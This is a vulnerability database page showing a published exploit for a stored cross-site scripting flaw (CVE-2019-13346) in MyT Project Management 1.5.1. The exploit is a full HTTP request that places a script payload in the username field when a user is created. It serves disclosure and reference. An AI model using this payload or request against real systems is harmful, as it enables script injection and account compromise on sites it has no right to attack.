Vulners
Lucene search
MyT Project Management 1.5.1 - User[username] Persistent Cross-Site Scripting Vulnerability
| Reporter | Title | Published | Views | Family All 9 |
|---|---|---|---|---|
 | CVE-2019-13346 | 17 Jul 201916:21 | – | cve |
 | CVE-2019-13346 | 17 Jul 201916:21 | – | cvelist |
 | MyT Project Management 1.5.1 - User[username] Persistent Cross-Site Scripting | 12 Jul 201900:00 | – | exploitdb |
 | EUVD-2019-4850 | 7 Oct 202500:30 | – | euvd |
 | MyT Project Management 1.5.1 - User[username] Persistent Cross-Site Scripting | 12 Jul 201900:00 | – | exploitpack |
 | CVE-2019-13346 | 17 Jul 201917:15 | – | nvd |
 | CVE-2019-13346 | 17 Jul 201917:15 | – | osv |
 | Cross site scripting | 17 Jul 201917:15 | – | prion |
 | CVE-2019-13346 | 22 May 202508:15 | – | redhatcve |
# Exploit Title: MyT Project Management - User[username] Stored Cross Site
Scripting
# Exploit Author: Metin Yunus Kandemir (kandemir)
# Vendor Homepage: https://manageyourteam.net/index.html
# Software Link: https://sourceforge.net/projects/myt/files/latest/download
# Version: 1.5.1
# Category: Webapps
# Tested on: Xampp for Windows
# Software Description : MyT is an extremely powerful project management
tool, and it's easy to use for both administrators and end-users with a
really intuitive structure.
# CVE : CVE-2019-13346
==================================================================
#Description: "User[username]" parameter has a xss vulnerability. Malicious
code is being written to database while user is creating process.
#to exploit vulnerability,add user that setting username as
"<sCript>alert("XSS")</sCript>" malicious code.
POST /myt-1.5.1/user/create HTTP/1.1
Host: target
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101
Firefox/60.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://target/myt-1.5.1/user/create
Content-Type: multipart/form-data;
boundary=---------------------------1016442643560510919154680312
Content-Length: 3921
Cookie: PHPSESSID=bp16alfk843c4qll0ejq302b2j
Connection: close
Upgrade-Insecure-Requests: 1
-----------------------------1016442643560510919154680312
Content-Disposition: form-data; name="User[username]"
<sCript>alert("XSS")</sCript>
-----------------------------1016442643560510919154680312
Content-Disposition: form-data; name="User[password]"
12345
-----------------------------1016442643560510919154680312
Content-Disposition: form-data; name="User[password_confirm]"
12345
-----------------------------1016442643560510919154680312
Content-Disposition: form-data; name="User[email]"
[email protected]
-----------------------------1016442643560510919154680312
Content-Disposition: form-data; name="User[name]"
-----------------------------1016442643560510919154680312
Content-Disposition: form-data; name="User[surname]"
.
..snip
..snip
.
# 0day.today [2019-12-04] #Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
12 Jul 2019 00:00Current
6.4Medium risk
Vulners AI Score6.4
EPSS0.00259